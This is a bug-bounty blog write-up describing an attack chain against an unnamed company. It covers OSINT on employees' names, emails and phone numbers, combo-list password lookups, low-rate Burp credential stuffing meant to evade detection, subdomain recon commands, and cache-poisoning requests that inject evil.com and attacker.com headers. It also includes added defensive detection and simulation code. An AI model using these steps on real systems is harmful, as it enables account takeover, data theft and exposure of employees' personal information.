Hey there!😁

Life lesson #1: Never trust "I'll clean it later." Life lesson #2: "It's just OSINT" is the biggest lie developers tell themselves. Life lesson #3: If your password is from 2016… it's probably still working somewhere in 2026 😏 And life lesson #4: A bug bounty hunter with coffee and curiosity is more dangerous than a 0-day. ☕

🎯 The Target (a.k.a. "It Started Like Any Normal Day…")

I wasn't even planning to hunt seriously that day.

Opened my laptop, sipped coffee ☕, and thought:

"Let's just do some light recon… nothing crazy."

Yeah. Sure.

Fast forward 6 hours, I had:

  • Employee phone numbers 📱
  • Old credentials 🔑
  • Internal email patterns 📧
  • A cache poisoning vector 🧪
  • And… access to sensitive data 😶‍🌫️

All from pure OSINT + chaining.

🧠 Phase 1: LinkedIn Recon — The Goldmine Nobody Sanitizes

Started with basic recon on LinkedIn.

What I looked for:

  • Employees in IT / DevOps / Support
  • Job posts mentioning:
      • Tech stack (React, Node, AWS, etc.)
      • Internal tools
      • Email patterns in descriptions

Found:

firstname.lastname@company.com

Classic. Delicious. Predictable.

Also grabbed:

  • Names
  • Roles
  • Locations

📱 Phase 2: Phone Number Pivot (The Underrated Move)

Took employee names → searched across public leaks & directories.

Then used: 👉 https://behindtheemail.com/


Boom 💥:

  • Phone numbers
  • Alternate emails
  • Possible linked accounts

Now I had:

Name + Email + Phone Number

That's not recon anymore… that's identity mapping.

🔑 Phase 3: Old Password Dumps (Where People Get Lazy)

Then I hit: 👉 https://www.proxynova.com/tools/comb

Searched using:

  • Email IDs
  • Username patterns

Found:

tenyo.dsd@company.com : Password@123
tenyo: qwerty2120

And here's the thing…

👉 People reuse passwords. 👉 Companies forget old services. 👉 Legacy systems NEVER die.

🔐 Phase 4: Credential Stuffing (Soft Touch, No Noise)

Used Burp Suite Intruder (low rate to avoid detection):

Payload:

Cluster bomb attack:
- Emails list
- Passwords list

Target endpoints:

  • /login
  • /admin
  • /api/auth

Result:

💥 Valid login on legacy subdomain
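The low-rate Intruder run above is designed to stay under per-IP request-rate limits. As an added example (not code from the original post), here is the detection a defender would run over auth logs instead: it keys on how many distinct accounts a single source tries within a window, not on requests per second. The log lines, IPs, paths and thresholds are constructed for the example.

```javascript
// Low-and-slow credential stuffing detection over constructed auth log lines
// ("<ISO time> <ip> <path> <account> <result>", not the write-up's target).
// A per-IP rate limit misses a slow attacker; distinct accounts per source don't.
const AUTH_PATHS = new Set(["/login", "/admin", "/api/auth"]);
const WINDOW_MS = 60 * 60 * 1000; // one hour
const DISTINCT_ACCOUNTS_THRESHOLD = 5;
const SAMPLE_LOG = [
  "2026-01-10T09:00:01Z 203.0.113.7 /login a.one@example.com FAIL",
  "2026-01-10T09:06:40Z 203.0.113.7 /api/auth b.two@example.com FAIL",
  "2026-01-10T09:13:05Z 203.0.113.7 /login c.three@example.com FAIL",
  "2026-01-10T09:21:58Z 203.0.113.7 /admin d.four@example.com FAIL",
  "2026-01-10T09:30:11Z 203.0.113.7 /login e.five@example.com FAIL",
  "2026-01-10T09:37:44Z 203.0.113.7 /api/auth f.six@example.com OK",
  "2026-01-10T09:02:00Z 198.51.100.9 /login g.seven@example.com FAIL",
  "2026-01-10T09:02:30Z 198.51.100.9 /login g.seven@example.com FAIL",
  "2026-01-10T09:03:10Z 198.51.100.9 /login g.seven@example.com OK",
];

function parseLine(line) {
  const [ts, ip, path, account, result] = line.trim().split(/\s+/);
  return { t: Date.parse(ts), ip, path, account, result };
}

// One finding per source IP that tried >= DISTINCT_ACCOUNTS_THRESHOLD distinct
// accounts on auth paths within WINDOW_MS; successful logins in that spread are hits.
function detectStuffing(lines) {
  const byIp = new Map();
  for (const ev of lines.map(parseLine)) {
    if (!AUTH_PATHS.has(ev.path)) continue;
    if (!byIp.has(ev.ip)) byIp.set(ev.ip, []);
    byIp.get(ev.ip).push(ev);
  }
  const findings = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.t - b.t);
    for (const start of events) { // sliding window anchored at each event
      const inWindow = events.filter(e => e.t >= start.t && e.t - start.t <= WINDOW_MS);
      const accounts = new Set(inWindow.map(e => e.account));
      if (accounts.size < DISTINCT_ACCOUNTS_THRESHOLD) continue;
      const hits = inWindow.filter(e => e.result === "OK").map(e => e.account);
      const requestsPerMinute = +(inWindow.length / (WINDOW_MS / 60000)).toFixed(2);
      findings.push({ ip, distinctAccounts: accounts.size, requestsPerMinute, hits });
      break;
    }
  }
  return findings;
}

console.log(JSON.stringify(detectStuffing(SAMPLE_LOG), null, 2));
```

The flagged source sends only 0.1 requests per minute, far below any rate limit, but touches six different accounts and lands one success; the second source retries one account and is not flagged.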

🌐 Phase 5: Subdomain & Surface Expansion

Mass recon time 🔎

Tools used:

subfinder
amass
httpx
katana

Command:

subfinder -d target.com | httpx -silent -status-code -title

Found:

uat.target.com
legacy.target.com
cdn.target.com

One stood out:

👉 cdn.target.com

⚠️ Phase 6: The "Harmless" Endpoint That Wasn't

While crawling:

katana -u https://target.com -depth 5

Found an endpoint:

/api/v1/config?region=us

Looked boring.

But response headers said:

X-Cache: HIT
Via: CDN

👀 Cacheable endpoint.

🧪 Phase 7: Web Cache Poisoning (Now We're Cooking)

Tested for cache poisoning.

Initial payload:

GET /api/v1/config?region=us HTTP/1.1
Host: cdn.target.com
X-Forwarded-Host: evil.com

Response reflected:

"base_url": "evil.com"

😏 Interesting.


Advanced Payload (Cache Key Confusion)

GET /api/v1/config?region=us HTTP/1.1
Host: cdn.target.com
X-Original-URL: /admin
X-Forwarded-Host: attacker.com

Cached Response:

  • Reflected attacker-controlled host
  • Served to other users

💣 Phase 8: Sensitive Data Leakage

Then I chained it.

Payload:

GET /api/v1/config?region=us HTTP/1.1
Host: cdn.target.com
X-Forwarded-Host: internal-api.target.local

Response:

"api_endpoint": "internal-api.target.local"
"auth_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

💀 Jackpot.
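To make the Phase 7 and Phase 8 behaviour concrete, here is an added simulation (not the post's code, and not the target's) of a CDN cache keyed on Host + path in front of an origin that trusts X-Forwarded-Host, beside a hardened origin that ignores the header, checks Host against an allow-list, and marks the config endpoint no-store. The hostnames (cdn.example.com, evil.test) and the origin logic are assumptions made for the example.

```javascript
// Simulated CDN cache in front of a config endpoint. Constructed for this
// example: hostnames, paths and origin logic are illustrative, not the
// write-up's target.
const TRUSTED_HOSTS = new Set(["cdn.example.com"]);

// Vulnerable origin: builds base_url from X-Forwarded-Host when present.
function vulnerableOrigin(req) {
  const host = req.headers["x-forwarded-host"] || req.headers["host"];
  return { status: 200, headers: {}, body: { base_url: `https://${host}` } };
}

// Hardened origin: X-Forwarded-Host is ignored, Host must be on an
// allow-list, and the response is marked uncacheable.
function hardenedOrigin(req) {
  const host = req.headers["host"];
  const headers = { "cache-control": "no-store" };
  if (!TRUSTED_HOSTS.has(host)) {
    return { status: 421, headers, body: { error: "misdirected request" } };
  }
  return { status: 200, headers, body: { base_url: `https://${host}` } };
}

// Shared cache keyed on method + Host + path, as a CDN typically keys
// entries. Any header outside that key is "unkeyed" input to the origin.
function makeCache(origin) {
  const store = new Map();
  return function fetch(req) {
    const key = `${req.method} ${req.headers["host"]} ${req.path}`;
    if (store.has(key)) return { ...store.get(key), cache: "HIT" };
    const res = origin(req);
    const cc = res.headers["cache-control"] || "";
    if (res.status === 200 && !cc.includes("no-store")) store.set(key, res);
    return { ...res, cache: "MISS" };
  };
}

// One request carrying X-Forwarded-Host, then a clean request from another
// user through the same cache. Returns what the second user receives.
function poisonThenFetch(origin) {
  const fetch = makeCache(origin);
  const base = { method: "GET", path: "/api/v1/config?region=us" };
  fetch({ ...base, headers: { host: "cdn.example.com", "x-forwarded-host": "evil.test" } });
  return fetch({ ...base, headers: { host: "cdn.example.com" } });
}

const victimVulnerable = poisonThenFetch(vulnerableOrigin);
const victimHardened = poisonThenFetch(hardenedOrigin);
console.log("vulnerable:", victimVulnerable.cache, victimVulnerable.body.base_url);
console.log("hardened:  ", victimHardened.cache, victimHardened.body.base_url);
```

With the vulnerable origin the second user gets a cache HIT carrying the first request's host in base_url; with the hardened origin every fetch is a MISS that reports the real host, and a Host value off the allow-list is refused outright.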

🕶️ Phase 9: Dark Web Correlation (The Spicy Part)

Took:

  • Emails
  • Passwords
  • Tokens

Cross-checked with breach dumps (public sources & forums).

Found:

  • Same employee emails in older breaches
  • Password reuse confirmed
  • Internal tools exposed in leaks

Realization:

This wasn't just a bug… This was a pattern of negligence.

🧰 Tools Used (My Arsenal)

  • Burp Suite (Intruder, Repeater, Logger++)
  • subfinder
  • amass
  • httpx
  • katana
  • proxynova (combo lists)
  • behindtheemail (OSINT pivoting)

🧩 Final Chain (How It All Connected)

  1. LinkedIn → Employee names
  2. OSINT → Emails + phone numbers
  3. Password dumps → Old credentials
  4. Credential stuffing → Valid login
  5. Recon → CDN endpoint
  6. Cache poisoning → Controlled responses
  7. Payload chaining → Internal API exposure
  8. Data leak → Tokens + sensitive configs

🚨 Impact

  • Internal API endpoints exposed
  • Authentication tokens leaked
  • User data potentially accessible
  • Cache poisoning affecting multiple users
  • Credential reuse vulnerability

🧠 Lessons Learned

For Developers:

  • Stop reusing credentials across environments
  • Sanitize ALL headers (X-Forwarded-* especially)
  • Don't cache sensitive endpoints
  • Kill legacy systems (seriously 😤)

For Hunters:

  • OSINT is NOT "low impact"
  • Chain everything
  • Cache poisoning is still underrated
  • Always test headers

🤯 Final Thought

This wasn't about hacking.

This was about:

Connecting dots nobody thought were connected.

A LinkedIn profile… A phone number… An old password… A misconfigured cache…

And suddenly…

💥 You're inside.

If you're still ignoring OSINT in bug bounty… You're leaving money on the table 💸

Connect with Me!

  • Instagram: @rev_shinchan
  • Gmail: rev30102001@gmail.com

#EnnamPolVazhlkai😇
